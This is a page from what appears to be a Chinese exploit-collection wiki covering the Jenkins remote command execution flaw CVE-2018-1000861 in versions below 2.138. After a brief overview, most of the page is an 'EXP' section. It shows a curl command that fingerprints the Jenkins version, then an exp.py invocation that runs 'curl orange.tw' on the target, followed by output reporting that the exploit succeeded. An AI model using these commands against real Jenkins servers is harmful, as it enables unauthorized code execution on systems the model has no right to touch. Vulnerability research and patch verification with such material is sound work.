menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right POChouse-main chevron_right Jenkins chevron_right Jenkins 远程命令执行漏洞(CVE-2018-1000861)
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    lightbulb_outline README

    漏洞概述

    Jenkins在沙盒中执行Groovy前会先检查脚本是否有错误,检查操作是没有沙盒的,攻击者可以通过Meta-Programming的方式,在检查这个步骤时执行任意命令。

    影响范围

    Jenkins version < 2.138

    EXP

    $ curl -s -I http://jenkins/| grep X-Jenkins
    X-Jenkins: 2.137
    X-Jenkins-Session: 20f72c2e
    X-Jenkins-CLI-Port: 50000
    X-Jenkins-CLI2-Port: 50000
    
    $ python exp.py http://jenkins/ 'curl orange.tw'
    [*] ANONYMOUS_READ disable!
    [*] Bypass with CVE-2018-1000861!
    [*] Exploit success!(it should be :P)